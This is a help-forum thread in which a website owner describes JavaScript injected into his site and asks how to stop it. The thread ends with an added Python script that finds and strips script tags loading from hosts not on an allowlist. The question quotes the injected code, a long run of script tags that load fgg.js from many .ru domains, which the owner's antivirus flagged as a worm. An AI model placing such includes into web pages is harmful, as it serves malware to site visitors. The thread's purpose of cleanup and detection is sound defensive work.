adammatthews1

Malware on my webserver:

I had a malware problem on www.avalonme.com last week. My webmaster deleted all files and uploaded backup files. We also changed the password. JavaScript (see below) is still being injected into the files, causing errors when I view pages in my Explorer browser, and Google is showing some of the pages as "attack" sites.

My webmaster is deleting and reloading the backup. This time he will make the public folder non-writeable. I use PC Security Shield anti-virus software and one of the events it shows reads: "7/17/2008 9:34:05 AM      Malicious HTTP object <http://www.gbradw.com/fgg.js>: detected virus 'Net-Worm.JS.Aspxor.a'." The code being injected can be viewed in the attached "Code Snippet". Any other suggestions to prevent whatever is injecting the JavaScript?
<script src=http://www.lodse.ru/fgg.js></script><script
src=http://www.h23f.ru/fgg.js></script><script
src=http://www.sdkj.ru/fgg.js></script><script
src=http://www.4cnw.ru/fgg.js></script><script
src=http://www.adwr.ru/fgg.js></script><script
src=http://www.gb53.ru/fgg.js></script><script
src=http://www.h23f.ru/fgg.js></script><script
src=http://www.vcre.ru/fgg.js></script><script
src=http://www.rrcs.ru/fgg.js></script><script
src=http://www.5kc3.ru/fgg.js></script><script
src=http://www.kc43.ru/fgg.js></script><script
src=http://www.kc43.ru/fgg.js></script><script
src=http://www.sdkj.ru/fgg.js></script><script
src=http://www.sslwer.ru/fgg.js></script><script
src=http://www.sdkj.ru/fgg.js></script><script
src=http://www.adwr.ru/fgg.js></script><script
src=http://www.keje.ru/fgg.js></script><script
src=http://www.lkc2.ru/fgg.js></script><script
src=http://www.bnrc.ru/fgg.js></script><script
src=http://www.sdkj.ru/fgg.js></script><script
src=http://www.kc43.ru/fgg.js></script><script
src=http://www.lkc2.ru/fgg.js></script><script
src=http://www.sdkj.ru/fgg.js></script><script
src=http://www.jex5.ru/fgg.js></script>


SOLUTION
ltulmer
This solution is only available to members.
To access this solution, you must be a member of Experts Exchange.
SOLUTION
Mohammed Hamada
adammatthews1

ASKER

Can I send this directly to your email address?   You're asking for a log of my computer, correct?  Is there any tool to analyze the website itself to see how the code is getting in?
SOLUTION
SOLUTION
Mohammed,

Log file is attached. When I ran "event viewer", it popped up a program with menu choices. Is there something else I need to do? I'll try to get a log from the webmaster as well since both our computers had the password on it.

Jahboite,

Thank you for your advice - I'll pass it to my webmaster.

hijackthis.log
SOLUTION
ASKER CERTIFIED SOLUTION
SOLUTION
SOLUTION
Hi everyone,
Thanks to everyone for their input. This has been a very frustrating and confusing experience. My webmaster deleted files again and re-loaded the backup. This time he write-protected the files and that seems to have solved the problem. We were never able to figure out where the virus originated.
moh10ly: I attached the Hijack file but never heard back from you?
I will treat this as "accept multiple answers" and assign points as appropriate after I give moh10ly a chance to respond.
Thanks again.
SOLUTION
Thank you all. I guess the origin of the Malware will never be determined. If someone invents a program to enable searching host server files and cleaning viruses, they'll deliver a major setback to these sociopaths who write malware.
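
Added example, not part of the original thread and not a tool mentioned in it: a Python check a webmaster could run over site files to flag and strip script tags that load from hosts outside an allowlist, including the unquoted, line-wrapped form shown in the question's code snippet. The hostnames, the sample page and all function names are constructed for illustration.

```python
import re
from urllib.parse import urlparse

# Matches <script ... src=URL ...></script>. The value may be unquoted and the
# tag may be split across lines, as in the snippet posted in the question.
SCRIPT_SRC = re.compile(
    r"<script\b[^>]*?\bsrc\s*=\s*(?:\"([^\"]*)\"|'([^']*)'|([^\s>]+))[^>]*>\s*</script\s*>",
    re.IGNORECASE,
)

def script_host(match):
    """Return the lowercase host a matched script tag loads from ('' if relative)."""
    src = next(g for g in match.groups() if g is not None)
    if src.startswith("//"):          # protocol-relative URL
        src = "http:" + src
    return (urlparse(src).hostname or "").lower()

def is_allowed(host, allowed_hosts):
    """Relative paths and allowlisted hosts (or their subdomains) are accepted."""
    return host == "" or any(host == a or host.endswith("." + a) for a in allowed_hosts)

def find_foreign_scripts(html, allowed_hosts):
    """List (line_number, host) for every script tag loading from an unlisted host."""
    hits = []
    for m in SCRIPT_SRC.finditer(html):
        host = script_host(m)
        if not is_allowed(host, allowed_hosts):
            hits.append((html.count("\n", 0, m.start()) + 1, host))
    return hits

def strip_foreign_scripts(html, allowed_hosts):
    """Return html with only the unlisted-host script tags removed."""
    return SCRIPT_SRC.sub(
        lambda m: m.group(0) if is_allowed(script_host(m), allowed_hosts) else "", html)

# Constructed sample page: a local script, an allowlisted CDN script, and two
# injected tags appended after </html> in the same form as the question's snippet.
SAMPLE = (
    "<html><head><script src=\"/js/menu.js\"></script>\n"
    "<script src='https://cdn.site.example/lib.js'></script></head>\n"
    "<body>Hello</body></html><script src=http://www.injected-a.example/fgg.js></script><script\n"
    "src=http://www.injected-b.example/fgg.js></script>\n"
)
ALLOWED = {"site.example"}  # constructed allowlist: the site's own domain

if __name__ == "__main__":
    for line, host in find_foreign_scripts(SAMPLE, ALLOWED):
        print(f"line {line}: script loaded from unlisted host {host}")
```

Comparing the flagged files' modification times against the web server's access log is the usual next step for narrowing down how the tags were written.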